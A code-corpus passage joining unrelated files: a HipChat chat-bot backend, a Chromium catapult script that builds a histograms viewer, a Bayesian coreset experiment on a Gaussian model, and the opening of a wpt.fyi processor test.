),
params=payload,
**settings.REQUESTS_OPTIONS
).json()
data = response['items']
while 'next' in response['links']:
response = requests.get(response['links']['next'],
params=payload, **settings.REQUESTS_OPTIONS).json()
data.extend(response['items'])
return data
class HipChatRoomMixin(object):
def update_available_rooms(self, q=None):
self._available_rooms = {}
# Use v1 token to grab a full room list if we can (good to avoid rate limiting)
if hasattr(settings, "V1_TOKEN"):
url = V1_TOKEN_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V1_TOKEN}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
if r.status_code == requests.codes.unauthorized:
raise Exception("V1_TOKEN authentication failed with HipChat")
for room in r.json()["rooms"]:
# Some integrations expect a particular name for the ID field.
# Better to use room.id.
room["id"] = room["room_id"]
self._available_rooms[room["name"]] = HipChatRoom(**room)
# Otherwise, grab 'em one-by-one via the v2 api.
else:
params = {}
params['start-index'] = 0
max_results = params['max-results'] = 1000
url = V2_TOKEN_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN}
while True:
resp = requests.get(url, params=params,
**settings.REQUESTS_OPTIONS)
if resp.status_code == requests.codes.unauthorized:
raise Exception("V2_TOKEN authentication failed with HipChat")
rooms = resp.json()
for room in rooms["items"]:
# Some integrations expect a particular name for the ID field.
# Better to use room.id
room["room_id"] = room["id"]
self._available_rooms[room["name"]] = HipChatRoom(**room)
logging.info('Got %d rooms', len(rooms['items']))
if len(rooms['items']) == max_results:
params['start-index'] += max_results
else:
break
self.save("hipchat_rooms", self._available_rooms)
if q:
q.put(self._available_rooms)
@property
def available_rooms(self):
if not hasattr(self, "_available_rooms"):
self._available_rooms = self.load('hipchat_rooms', None)
if not self._available_rooms:
self.update_available_rooms()
return self._available_rooms
def get_room_by_jid(self, jid):
for room in self.available_rooms.values():
if "xmpp_jid" in room and room["xmpp_jid"] == jid:
return room
return None
def get_room_from_message(self, message):
return self.get_room_from_name_or_id(message.data.channel.name)
def get_room_from_name_or_id(self, name_or_id):
for name, room in self.available_rooms.items():
if name_or_id.lower() == name.lower():
return room
if "xmpp_jid" in room and name_or_id == room["xmpp_jid"]:
return room
if "room_id" in room and name_or_id == room["room_id"]:
return room
return None
class HipChatXMPPClient(ClientXMPP, HipChatRosterMixin, HipChatRoomMixin, StorageMixin, PubSubMixin):
def start_xmpp_client(self, xmpp_bridge_queue=None, backend_name=""):
logger = logging.getLogger(__name__)
if not xmpp_bridge_queue:
logger.error("Missing required bridge queue")
self.xmpp_bridge_queue = xmpp_bridge_queue
self.backend_name = backend_name
ClientXMPP.__init__(self, "%s/bot" % settings.HIPCHAT_USERNAME, settings.HIPCHAT_PASSWORD)
if settings.USE_PROXY:
self.use_proxy = True
self.proxy_config = {
'host': settings.PROXY_HOSTNAME,
'port': settings.PROXY_PORT,
'username': settings.PROXY_USERNAME,
'password': settings.PROXY_PASSWORD,
}
self.rooms = []
self.default_room = settings.HIPCHAT_DEFAULT_ROOM
my_user_url = "https://%(server)s/v2/user/%(user_id)s?auth_token=%(token)s" % {
"user_id": settings.HIPCHAT_USERNAME.split("@")[0].split("_")[1],
"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN,
}
r = requests.get(my_user_url, **settings.REQUESTS_OPTIONS)
resp = r.json()
if "email" in resp:
settings.HIPCHAT_EMAIL = resp["email"]
settings.HIPCHAT_HANDLE = resp["mention_name"]
settings.HIPCHAT_NAME = resp["name"]
else:
raise EnvironmentError(
"\n\nError getting user info from Hipchat. This is usually a problem with the\n"
"username or V2 token, but here's what I heard back from them: \n\n %s\n\n" % resp
)
self.available_rooms
if hasattr(settings, "HIPCHAT_ROOMS") and settings.HIPCHAT_ROOMS:
for r in settings.HIPCHAT_ROOMS:
if r != "":
if not hasattr(self, "default_room"):
self.default_room = r
try:
self.rooms.append(self.available_rooms[r])
except KeyError:
logger.error(
u'"{0}" is not an available room, ask'
' "@{1} what are the rooms?" for the full list.'
.format(r, settings.HIPCHAT_HANDLE))
else:
for name, r in self.available_rooms.items():
if not hasattr(self, "default_room"):
self.default_room = r
self.rooms.append(r)
self.nick = settings.HIPCHAT_HANDLE
self.handle = settings.HIPCHAT_HANDLE
self.mention_handle = "@%s" % settings.HIPCHAT_HANDLE
self.whitespace_keepalive = True
self.whitespace_keepalive_interval = 30
if settings.ALLOW_INSECURE_HIPCHAT_SERVER is True:
self.add_event_handler('ssl_invalid_cert', lambda cert: True)
self.add_event_handler("roster_update", self.join_rooms)
self.add_event_handler("session_start", self.session_start)
self.add_event_handler("message", self.message_recieved)
self.add_event_handler("groupchat_message", self.room_message)
self.add_event_handler("groupchat_invite", self.room_invite)
self.add_event_handler("error", self.handle_errors)
self.add_event_handler("presence_error", self.handle_errors)
self.register_plugin('xep_0045') # MUC
def session_start(self, event):
self.send_presence()
try:
self.get_roster()
except IqError as err:
logging.error('There was an error getting the roster')
logging.error(err.iq['error']['condition'])
self.disconnect()
except IqTimeout:
logging.error('Server is taking too long to respond. Disconnecting.')
self.disconnect()
def join_rooms(self, event):
for r in self.rooms:
if "xmpp_jid" in r:
self.plugin['xep_0045'].joinMUC(r["xmpp_jid"], settings.HIPCHAT_NAME, wait=True)
def handle_errors(self, event):
print("got error event")
print(event)
def room_invite(self, event):
logging.info("Invite recieved for %s" % event)
for r in self.rooms:
if "xmpp_jid" in r:
self.plugin['xep_0045'].joinMUC(r["xmpp_jid"], settings.HIPCHAT_NAME, wait=True)
def update_will_roster_and_rooms(self):
people = self.load('will_hipchat_people', {})
# Loop through the connected rooms (self.roster comes from ClientXMPP)
for roster_id in self.roster:
cur_roster = self.roster[roster_id]
# Loop through the users in a given room
for user_id in cur_roster:
user_data = cur_roster[user_id]
if user_data["name"] != "":
# If we don't have this user in the people, add them.
if not user_id in people:
people[user_id] = Person()
hipchat_id = user_id.split("@")[0].split("_")[1]
# Update their info
people[user_id].update({
"name": user_data["name"],
"jid": user_id,
"hipchat_id": hipchat_id,
})
# If we don't have a nick yet, pull it and mention_name off the master user list.
if not hasattr(people[user_id], "nick") and hipchat_id in self.people:
user_data = self.get_user_list[hipchat_id]
people[user_id].nick = user_data["mention_name"]
people[user_id].mention_name = user_data["mention_name"]
# If it's me, save that info!
if people[user_id].get("name", "") == self.nick:
self.me = people[user_id]
self.save("will_hipchat_people", people)
self.update_available_rooms()
def room_message(self, msg):
self._send_to_backend(msg)
def message_recieved(self, msg):
if msg['type'] in ('chat', 'normal'):
self._send_to_backend(msg)
def real_sender_jid(self, msg):
# There's a bug in sleekXMPP where it doesn't set the "from_jid" properly.
# Thus, this hideous hack.
msg_str = "%s" % msg
start = 'from_jid="'
start_pos = msg_str.find(start)
if start_pos != -1:
cut_start = start_pos + len(start)
return msg_str[cut_start:msg_str.find('"', cut_start)]
return msg["from"]
def _send_to_backend(self, msg):
stripped_msg = Bunch()
# TODO: Find a faster way to do this - this is crazy.
for k, v in msg.__dict__.items():
try:
pickle.dumps(v)
stripped_msg[k] = v
except:
pass
for k in msg.xml.keys():
try:
# print(k)
# print(msg.xml.get(k))
pickle.dumps(msg.xml.get(k))
stripped_msg[k] = msg.xml.get(k)
except:
# print("failed to parse %s" % k)
pass
stripped_msg.xmpp_jid = msg.getMucroom()
stripped_msg.body = msg["body"]
self.xmpp_bridge_queue.put(stripped_msg)
class HipChatBackend(IOBackend, HipChatRosterMixin, HipChatRoomMixin, StorageMixin):
friendly_name = "HipChat"
internal_name = "will.backends.io_adapters.hipchat"
required_settings = [
{
"name": "HIPCHAT_USERNAME",
"obtain_at": """1. Go to hipchat, and create a new user for will.
2. Log into will, and go to Account settings>XMPP/Jabber Info.
3. On that page, the 'Jabber ID' is the value you want to use.""",
},
{
"name": "HIPCHAT_PASSWORD",
"obtain_at": (
"1. Go to hipchat, and create a new user for will. "
"Note that password - this is the value you want. "
"It's used for signing in via XMPP."
),
},
{
"name": "HIPCHAT_V2_TOKEN",
"obtain_at": """1. Log into hipchat using will's user.
2. Go to https://your-org.hipchat.com/account/api
3. Create a token.
4. Copy the value - this is the HIPCHAT_V2_TOKEN.""",
}
]
def send_direct_message(self, user_id, message_body, html=False, card=None, notify=False, **kwargs):
if kwargs:
logging.warn("Unknown keyword args for send_direct_message: %s" % kwargs)
format = "text"
if html:
format = "html"
try:
# https://www.hipchat.com/docs/apiv2/method/private_message_user
url = PRIVATE_MESSAGE_URL % {"server": settings.HIPCHAT_SERVER,
"user_id": user_id,
"token": settings.HIPCHAT_V2_TOKEN}
data = {
"message": message_body,
"message_format": format,
"notify": notify,
"card": card,
}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
r = requests.post(url, headers=headers, data=json.dumps(data), **settings.REQUESTS_OPTIONS)
r.raise_for_status()
except:
logging.critical("Error in send_direct_message: \n%s" % traceback.format_exc())
def send_room_message(self, room_id, message_body, html=False, color="green", notify=False, card=None, **kwargs):
if kwargs:
logging.warn("Unknown keyword args for send_room_message: %s" % kwargs)
format = "text"
if html:
format = "html"
try:
# https://www.hipchat.com/docs/apiv2/method/send_room_notification
url = ROOM_NOTIFICATION_URL % {"server": settings.HIPCHAT_SERVER,
"room_id": room_id,
"token": settings.HIPCHAT_V2_TOKEN}
data = {
"message": message_body,
"message_format": format,
"color": color,
"notify": notify,
"card": card,
}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
r = requests.post(url, headers=headers, data=json.dumps(data), **settings.REQUESTS_OPTIONS)
r.raise_for_status()
except:
logging.critical("Error in send_room_message: \n%s" % traceback.format_exc())
def set_room_topic(self, room_id, topic):
try:
# https://www.hipchat.com/docs/apiv2/method/send_room_notification
url = ROOM_TOPIC_URL % {"server": settings.HIPCHAT_SERVER,
"room_id": room_id,
"token": settings.HIPCHAT_V2_TOKEN}
data = {
"topic": topic,
}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
requests.put(url, headers=headers, data=json.dumps(data), **settings.REQUESTS_OPTIONS)
except:
logging.critical("Error in set_room_topic: \n%s" % traceback.format_exc())
def get_room_from_message(self, event):
kwargs = {}
if hasattr(event, "kwargs"):
kwargs.update(event.kwargs)
if hasattr(event, "source_message") and event.source_message:
send_source = event.source_message
if hasattr(event.source_message, "data"):
send_source = event.source_message.data
if send_source.is_private_chat:
# Private, 1-1 chats.
return False
else:
# We're in a public room
return send_source.channel.id
else:
# Came from webhook/etc
if "room" in kwargs:
return kwargs["room"],
else:
return self.get_room_from_name_or_id(settings.HIPCHAT_DEFAULT_ROOM)["room_id"]
return False
def get_hipchat_user(self, user_id, q=None):
url = USER_DETAILS_URL % {"server": settings.HIPCHAT_SERVER,
"user_id": user_id,
"token": settings.HIPCHAT_V2_TOKEN}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
if q:
q.put(r.json())
else:
return r.json()
@property
def people(self):
if not hasattr(self, "_people"):
full_roster = {}
# Grab the first roster page, and populate full_roster
url = ALL_USERS_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN,
"start_index": 0,
"max_results": 1000}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for user in r.json()['items']:
full_roster["%s" % (user['id'],)] = Person(
id=user["id"],
handle=user["mention_name"],
mention_handle="@%s" % user["mention_name"],
source=clean_for_pickling(user),
name=user["name"],
)
# Keep going through the next pages until we're out of pages.
while 'next' in r.json()['links']:
url = "%s&auth_token=%s" % (r.json()['links']['next'], settings.HIPCHAT_V2_TOKEN)
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for user in r.json()['items']:
full_roster["%s" % (user['id'],)] = Person(
id=user["id"],
handle=user["mention_name"],
mention_handle="@%s" % user["mention_name"],
source=clean_for_pickling(user),
name=user["name"],
)
self._people = full_roster
for k, u in full_roster.items():
if u.handle == settings.HIPCHAT_HANDLE:
self.me = u
return self._people
@property
def channels(self):
if not hasattr(self, "_channels"):
all_rooms = {}
# Grab the first roster page, and populate all_rooms
url = ALL_ROOMS_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN,
"start_index": 0,
"max_results": 1000}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for room in r.json()['items']:
# print(room)
all_rooms["%s" % (room['xmpp_jid'],)] = Channel(
id=room["id"],
name=room["name"],
source=clean_for_pickling(room),
members={},
)
# Keep going through the next pages until we're out of pages.
while 'next' in r.json()['links']:
url = "%s&auth_token=%s" % (r.json()['links']['next'], settings.HIPCHAT_V2_TOKEN)
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for room in r.json()['items']:
all_rooms["%s" % (room['xmpp_jid'],)] = Channel(
id=room["id"],
name=room["name"],
source=clean_for_pickling(room),
members={}
)
self._channels = all_rooms
return self._channels
def normalize_incoming_event(self, event):
logging.debug("hipchat: normalize_incoming_event - %s" % event)
if event["type"] in ("chat", "normal", "groupchat") and ("from_jid" in event or "from" in event):
sender = self.get_user_from_message(event)
interpolated_handle = "@%s" % self.me.handle
will_is_mentioned = False
will_said_it = False
channel = None
if "xmpp_jid" in event and event["xmpp_jid"]:
channel = clean_for_pickling(self.channels[event["xmpp_jid"]])
is_private_chat = False
else:
if event["type"] in ("chat", "normal"):
is_private_chat = True
is_direct = False
if is_private_chat or event["body"].startswith(interpolated_handle):
is_direct = True
if event["body"].startswith(interpolated_handle):
event["body"] = event["body"][len(interpolated_handle):].strip()
if interpolated_handle in event["body"]:
will_is_mentioned = True
if sender and self.me and sender.id == self.me.id:
will_said_it = True
m = Message(
content=event["body"],
is_direct=is_direct,
is_private_chat=is_private_chat,
is_group_chat=not is_private_chat,
backend=self.internal_name,
sender=sender,
channel=channel,
will_is_mentioned=will_is_mentioned,
will_said_it=will_said_it,
backend_supports_acl=True,
original_incoming_event=clean_for_pickling(event),
)
# print("normalized:")
# print(m.__dict__)
return m
else:
# print("Unknown event type")
# print(event)
return None
def handle_outgoing_event(self, event):
kwargs = {}
if hasattr(event, "kwargs"):
kwargs.update(event.kwargs)
room = None
passed_room = None
if "room" in kwargs:
passed_room = kwargs["room"]
if "channel" in kwargs:
passed_room = kwargs["channel"]
if passed_room:
if isinstance(passed_room, str):
# User passed in a room string
room = self.get_room_from_name_or_id(passed_room)
else:
# User found the internal HipChatRoom object and passed it.
room = passed_room
else:
# Default to the room we heard this message in.
room = self.get_room_from_message(event)
room_id = None
if room and hasattr(room, "id"):
room_id = room.id
else:
room_id = room
if event.type in ["say", "reply"]:
event.content = re.sub(r'>\s+<', '><', event.content)
if hasattr(event, "source_message") and event.source_message and not room:
send_source = event.source_message
if hasattr(event.source_message, "data"):
send_source = event.source_message.data
if send_source.is_private_chat:
# Private, 1-1 chats.
self.send_direct_message(send_source.sender.id, event.content, **kwargs)
return
# Otherwise trust room.
self.send_room_message(
room_id,
event.content,
**kwargs
)
elif event.type in ["topic_change", ]:
if room_id:
self.set_room_topic(room_id, event.content)
else:
if hasattr(event, "source_message") and event.source_message:
send_source = event.source_message
if hasattr(event.source_message, "data"):
send_source = event.source_message.data
self.send_direct_message(send_source.sender.id, "I can't set the topic of a one-to-one chat. Let's just talk.", **kwargs)
elif (
event.type == "message.no_response"
and event.data.is_direct
and event.data.will_said_it is False
):
if event.data.original_incoming_event.type == "groupchat":
self.send_room_message(
event.data.channel.id,
random.choice(UNSURE_REPLIES),
**kwargs
)
else:
self.send_direct_message(
event.data.sender.id,
random.choice(UNSURE_REPLIES),
**kwargs
)
def __handle_bridge_queue(self):
while True:
try:
try:
input_event = self.xmpp_bridge_queue.get(timeout=settings.EVENT_LOOP_INTERVAL)
if input_event:
self.handle_incoming_event(input_event)
except Empty:
pass
except (KeyboardInterrupt, SystemExit):
pass
self.sleep_for_event_loop()
def bootstrap(self):
# Bootstrap must provide a way to to have:
# a) self.normalize_incoming_event fired, or incoming events put into self.incoming_queue
# b) any necessary threads running for a)
# c) self.me (Person) defined, with Will's info
# d) self.people (dict of People) defined, with everyone in an organization/backend
# e) self.channels (dict of Channels) defined, with all available channels/rooms.
# Note that Channel asks for members, a list of People.
# f) A way for self.handle, self.me, self.people, and self.channels to be kept accurate,
# with a maximum lag of 60 seconds.
self.client = HipChatXMPPClient("%s/bot" % settings.HIPCHAT_USERNAME, settings.HIPCHAT_PASSWORD)
self.xmpp_bridge_queue = Queue()
self.client.start_xmpp_client(
xmpp_bridge_queue=self.xmpp_bridge_queue,
backend_name=self.internal_name,
)
self.client.connect()
# Even though these are properties, they do some gets and self-fillings.
self.people
self.channels
self.bridge_thread = Process(target=self.__handle_bridge_queue)
self.bridge_thread.start()
self.xmpp_thread = Process(target=self.client.process, kwargs={"block": True})
self.xmpp_thread.start()
def terminate(self):
if hasattr(self, "xmpp_thread"):
self.xmpp_thread.terminate()
if hasattr(self, "bridge_thread"):
self.bridge_thread.terminate()
while (
(hasattr(self, "xmpp_thread") and self.xmpp_thread.is_alive())
or (hasattr(self, "bridge_thread") and self.bridge_thread.is_alive())
):
time.sleep(0.2)
|
tracing/tracing_build/vulcanize_histograms_viewer.py
|
tingshao/catapult
| 2,151 |
115926
|
<reponame>tingshao/catapult<filename>tracing/tracing_build/vulcanize_histograms_viewer.py
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import tracing_project
from py_vulcanize import generate
from tracing_build import render_histograms_viewer
def VulcanizeHistogramsViewer():
"""Vulcanizes Histograms viewer with its dependencies.
Args:
path: destination to write the vulcanized viewer HTML.
"""
vulcanizer = tracing_project.TracingProject().CreateVulcanizer()
load_sequence = vulcanizer.CalcLoadSequenceForModuleNames(
['tracing_build.histograms_viewer'])
return generate.GenerateStandaloneHTMLAsString(load_sequence)
def VulcanizeAndRenderHistogramsViewer(
histogram_dicts, output_stream, reset_results=False):
render_histograms_viewer.RenderHistogramsViewer(
histogram_dicts, output_stream, reset_results,
VulcanizeHistogramsViewer())
|
examples/gaussian/main.py
|
trevorcampbell/hilbert-coresets
| 118 |
115944
|
<gh_stars>100-1000
import numpy as np
import scipy.linalg as sl
import pickle as pk
import os, sys
import argparse
import time
#make it so we can import models/etc from parent folder
import bayesiancoresets as bc
sys.path.insert(1, os.path.join(sys.path[0], '../common'))
import model_gaussian as gaussian
import results
import plotting
def plot(arguments):
# load only the results that match (avoid high mem usage)
to_match = vars(arguments)
#remove any ignored params
if arguments.summarize is not None:
for nm in arguments.summarize:
to_match.pop(nm, None)
#remove any legend param
to_match.pop(arguments.plot_legend, None)
#load cols from results dfs that match remaining keys
resdf = results.load_matching(to_match)
#call the generic plot function
plotting.plot(arguments, resdf)
def run(arguments):
# check if result already exists for this run, and if so, quit
if results.check_exists(arguments):
print('Results already exist for arguments ' + str(arguments))
print('Quitting.')
quit()
#######################################
#######################################
## Step 0: Setup
#######################################
#######################################
np.random.seed(arguments.trial)
bc.util.set_verbosity(arguments.verbosity)
if arguments.coreset_size_spacing == 'log':
Ms = np.unique(np.logspace(0., np.log10(arguments.coreset_size_max), arguments.coreset_num_sizes, dtype=np.int32))
else:
Ms = np.unique(np.linspace(1, arguments.coreset_size_max, arguments.coreset_num_sizes, dtype=np.int32))
#make sure the first size to record is 0
if Ms[0] != 0:
Ms = np.hstack((0, Ms))
#######################################
#######################################
## Step 1: Generate a Synthetic Dataset
#######################################
#######################################
#change these to change the prior / likelihood
mu0 = np.zeros(arguments.data_dim)
Sig0 = np.eye(arguments.data_dim)
Sig = np.eye(arguments.data_dim)
#these are computed
Sig0inv = np.linalg.inv(Sig0)
Siginv = np.linalg.inv(Sig)
LSigInv = np.linalg.cholesky(Siginv) #Siginv = LL^T, L Lower tri
USig = sl.solve_triangular(LSigInv, np.eye(LSigInv.shape[0]), lower=True, overwrite_b=True, check_finite=False).T # Sig = UU^T, U upper tri
th = np.ones(arguments.data_dim)
logdetSig = np.linalg.slogdet(Sig)[1]
#######################################
#######################################
## Step 2: Calculate Likelihoods/Projectors
#######################################
#######################################
print('Computing true posterior')
x = np.random.multivariate_normal(th, Sig, arguments.data_num)
mup, USigp, LSigpInv = gaussian.weighted_post(mu0, Sig0inv, Siginv, x, np.ones(x.shape[0]))
Sigp = USigp.dot(USigp.T)
SigpInv = LSigpInv.dot(LSigpInv.T)
#create the log_likelihood function
print('Creating log-likelihood function')
log_likelihood = lambda x, th : gaussian.log_likelihood(x, th, Siginv, logdetSig)
print('Creating gradient log-likelihood function')
grad_log_likelihood = lambda x, th : gaussian.gradx_log_likelihood(x, th, Siginv)
print('Creating tuned projector for Hilbert coreset construction')
#create the sampler for the "optimally-tuned" Hilbert coreset
sampler_optimal = lambda n, w, pts : mup + np.random.randn(n, mup.shape[0]).dot(USigp.T)
prj_optimal = bc.BlackBoxProjector(sampler_optimal, arguments.proj_dim, log_likelihood, grad_log_likelihood)
print('Creating untuned projector for Hilbert coreset construction')
#create the sampler for the "realistically-tuned" Hilbert coreset
xhat = x[np.random.randint(0, x.shape[0], int(np.sqrt(x.shape[0]))), :]
muhat, USigHat, LSigHatInv = gaussian.weighted_post(mu0, Sig0inv, Siginv, xhat, np.ones(xhat.shape[0]))
sampler_realistic = lambda n, w, pts : muhat + np.random.randn(n, muhat.shape[0]).dot(USigHat.T)
prj_realistic = bc.BlackBoxProjector(sampler_realistic, arguments.proj_dim, log_likelihood, grad_log_likelihood)
print('Creating black box projector')
def sampler_w(n, wts, pts):
if wts is None or pts is None or pts.shape[0] == 0:
wts = np.zeros(1)
pts = np.zeros((1, mu0.shape[0]))
muw, USigw, _ = gaussian.weighted_post(mu0, Sig0inv, Siginv, pts, wts)
return muw + np.random.randn(n, muw.shape[0]).dot(USigw.T)
prj_bb = bc.BlackBoxProjector(sampler_w, arguments.proj_dim, log_likelihood, grad_log_likelihood)
print('Creating exact projectors')
#TODO need to fix all the transposes in this...
class GaussianProjector(bc.Projector):
def project(self, pts, grad=False):
nu = (pts - self.muw).dot(LSigInv)
PsiL = LSigInv.T.dot(self.USigw)
Psi = PsiL.dot(PsiL.T)
nu = np.hstack((nu.dot(PsiL), np.sqrt(0.5*np.trace(np.dot(Psi.T, Psi)))*np.ones(nu.shape[0])[:,np.newaxis]))
nu *= np.sqrt(nu.shape[1])
if not grad:
return nu
else:
gnu = np.hstack((SigLInv.dot(PsiL), np.zeros(pts.shape[1])[:,np.newaxis])).T
gnu = np.tile(gnu, (pts.shape[0], 1, 1))
gnu *= np.sqrt(gnu.shape[1])
return nu, gnu
def update(self, wts = None, pts = None):
if wts is None or pts is None or pts.shape[0] == 0:
wts = np.zeros(1)
pts = np.zeros((1, mu0.shape[0]))
self.muw, self.USigw, self.LSigwInv = gaussian.weighted_post(mu0, Sig0inv, Siginv, pts, wts)
prj_optimal_exact = GaussianProjector()
prj_optimal_exact.update(np.ones(x.shape[0]), x)
prj_realistic_exact = GaussianProjector()
prj_realistic_exact.update(np.ones(xhat.shape[0]), xhat)
#######################################
#######################################
## Step 3: Construct Coreset
#######################################
#######################################
##############################
print('Creating coreset construction objects')
#create coreset construction objects
sparsevi_exact = bc.SparseVICoreset(x, GaussianProjector(), opt_itrs = arguments.opt_itrs, step_sched = eval(arguments.step_sched))
sparsevi = bc.SparseVICoreset(x, prj_bb, opt_itrs = arguments.opt_itrs, step_sched = eval(arguments.step_sched))
giga_optimal = bc.HilbertCoreset(x, prj_optimal)
giga_optimal_exact = bc.HilbertCoreset(x,prj_optimal_exact)
giga_realistic = bc.HilbertCoreset(x,prj_realistic)
giga_realistic_exact = bc.HilbertCoreset(x,prj_realistic_exact)
unif = bc.UniformSamplingCoreset(x)
algs = {'SVI-EXACT': sparsevi_exact,
'SVI': sparsevi,
'GIGA-OPT': giga_optimal,
'GIGA-OPT-EXACT': giga_optimal_exact,
'GIGA-REAL': giga_realistic,
'GIGA-REAL-EXACT': giga_realistic_exact,
'US': unif}
alg = algs[arguments.alg]
print('Building coreset')
w = []
p = []
cputs = np.zeros(Ms.shape[0])
t_build = 0
for m in range(Ms.shape[0]):
print('M = ' + str(Ms[m]) + ': coreset construction, '+ arguments.alg + ' ' + str(arguments.trial))
t0 = time.process_time()
itrs = (Ms[m] if m == 0 else Ms[m] - Ms[m-1])
alg.build(itrs)
t_build += time.process_time()-t0
wts, pts, idcs = alg.get()
#store weights/pts/runtime
w.append(wts)
p.append(pts)
cputs[m] = t_build
##############################
##############################
## Step 4: Evaluate coreset
##############################
##############################
# computing kld and saving results
muw = np.zeros((Ms.shape[0], mu0.shape[0]))
Sigw = np.zeros((Ms.shape[0], mu0.shape[0], mu0.shape[0]))
rklw = np.zeros(Ms.shape[0])
fklw = np.zeros(Ms.shape[0])
csizes = np.zeros(Ms.shape[0])
mu_errs = np.zeros(Ms.shape[0])
Sig_errs = np.zeros(Ms.shape[0])
for m in range(Ms.shape[0]):
csizes[m] = (w[m] > 0).sum()
muw[m, :], USigw, LSigwInv = gaussian.weighted_post(mu0, Sig0inv, Siginv, p[m], w[m])
Sigw[m, :, :] = USigw.dot(USigw.T)
rklw[m] = gaussian.KL(muw[m,:], Sigw[m,:,:], mup, SigpInv)
fklw[m] = gaussian.KL(mup, Sigp, muw[m,:], LSigwInv.dot(LSigwInv.T))
mu_errs[m] = np.sqrt(((mup - muw[m,:])**2).sum()) / np.sqrt((mup**2).sum())
Sig_errs[m] = np.sqrt(((Sigp - Sigw[m,:,:])**2).sum()) / np.sqrt((Sigp**2).sum())
results.save(arguments, csizes = csizes, Ms = Ms, cputs = cputs, rklw = rklw, fklw = fklw, mu_errs = mu_errs, Sig_errs = Sig_errs)
#also save muw/Sigw/etc for plotting coreset visualizations
f = open('results/coreset_data.pk', 'wb')
res = (x, mu0, Sig0, Sig, mup, Sigp, w, p, muw, Sigw)
pk.dump(res, f)
f.close()
############################
############################
## Parse arguments
############################
############################
parser = argparse.ArgumentParser(description="Runs Riemannian linear regression (employing coreset contruction) on the specified dataset")
subparsers = parser.add_subparsers(help='sub-command help')
run_subparser = subparsers.add_parser('run', help='Runs the main computational code')
run_subparser.set_defaults(func=run)
plot_subparser = subparsers.add_parser('plot', help='Plots the results')
plot_subparser.set_defaults(func=plot)
parser.add_argument('--data_num', type=int, default='1000', help='Dataset size/number of examples')
parser.add_argument('--data_dim', type=int, default = '200', help="The dimension of the multivariate normal distribution to use for this experiment")
parser.add_argument('--alg', type=str, default='SVI', choices = ['SVI', 'SVI-EXACT', 'GIGA-OPT', 'GIGA-OPT-EXACT', 'GIGA-REAL', 'GIGA-REAL-EXACT', 'US'], help="The name of the coreset construction algorithm to use")
parser.add_argument("--proj_dim", type=int, default=100, help="The number of samples taken when discretizing log likelihoods for these experiments")
parser.add_argument('--coreset_size_max', type=int, default=200, help="The maximum coreset size to evaluate")
parser.add_argument('--coreset_num_sizes', type=int, default=7, help="The number of coreset sizes to evaluate")
parser.add_argument('--coreset_size_spacing', type=str, choices=['log', 'linear'], default='log', help="The spacing of coreset sizes to test")
parser.add_argument('--opt_itrs', type=int, default = 100, help="Number of optimization iterations (for methods that use iterative weight refinement)")
parser.add_argument('--step_sched', type=str, default = "lambda i : 1./(1+i)", help="Optimization step schedule (for methods that use iterative weight refinement); entered as a python lambda expression surrounded by quotes")
parser.add_argument('--trial', type=int, help="The trial number - used to initialize random number generation (for replicability)")
parser.add_argument('--results_folder', type=str, default="results/", help="This script will save results in this folder")
parser.add_argument('--verbosity', type=str, default="error", choices=['error', 'warning', 'critical', 'info', 'debug'], help="The verbosity level.")
# plotting arguments
plot_subparser.add_argument('plot_x', type = str, help="The X axis of the plot")
plot_subparser.add_argument('plot_y', type = str, help="The Y axis of the plot")
plot_subparser.add_argument('--plot_title', type = str, help="The title of the plot")
plot_subparser.add_argument('--plot_x_label', type = str, help="The X axis label of the plot")
plot_subparser.add_argument('--plot_y_label', type = str, help="The Y axis label of the plot")
plot_subparser.add_argument('--plot_x_type', type=str, choices=["linear","log"], default = "log", help = "Specifies the scale for the X-axis")
plot_subparser.add_argument('--plot_y_type', type=str, choices=["linear","log"], default = "log", help = "Specifies the scale for the Y-axis.")
plot_subparser.add_argument('--plot_legend', type=str, help = "Specifies the variable to create a legend for.")
plot_subparser.add_argument('--plot_height', type=int, default=850, help = "Height of the plot's html canvas")
plot_subparser.add_argument('--plot_width', type=int, default=850, help = "Width of the plot's html canvas")
plot_subparser.add_argument('--plot_type', type=str, choices=['line', 'scatter'], default='scatter', help = "Type of plot to make")
plot_subparser.add_argument('--plot_fontsize', type=str, default='32pt', help = "Font size for the figure, e.g., 32pt")
plot_subparser.add_argument('--plot_toolbar', action='store_true', help = "Show the Bokeh toolbar")
plot_subparser.add_argument('--summarize', type=str, nargs='*', help = 'The command line arguments to ignore value of when matching to plot a subset of data. E.g. --summarize trial data_num will compute result statistics over both trial and number of datapoints')
plot_subparser.add_argument('--groupby', type=str, help = 'The command line argument group rows by before plotting. No groupby means plotting raw data; groupby will do percentile stats for all data with the same groupby value. E.g. --groupby Ms in a scatter plot will compute result statistics for fixed values of M, i.e., there will be one scatter point per value of M')
arguments = parser.parse_args()
arguments.func(arguments)
|
results-processor/processor_test.py
|
lucacasonato/wpt.fyi
| 122 |
115979
|
# Copyright 2019 The WPT Dashboard Project. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import unittest
from unittest.mock import call, patch
from werkzeug.datastructures import MultiDict
import test_util
import wptreport
from processor import Processor, process_report
from test_server import AUTH_CREDENTIALS
class ProcessorTest(unittest.TestCase):
def fake_download(self, expected_path, response):
def _download(path):
if expected_path is None:
self.fail('Unexpected download:' + path)
self.assertEqual(expected_path, path)
return response
return _download
def test_known_extension(self):
self.assertEqual(
Processor.known_extension('https://wpt.fyi/test.json.gz'),
'.json.gz')
self.assertEqual(
Processor.known_extension('https://wpt.fyi/test.txt.gz'),
'.txt.gz')
self.assertEqual(
Processor.known_extension('https://wpt.fyi/test.json'), '.json')
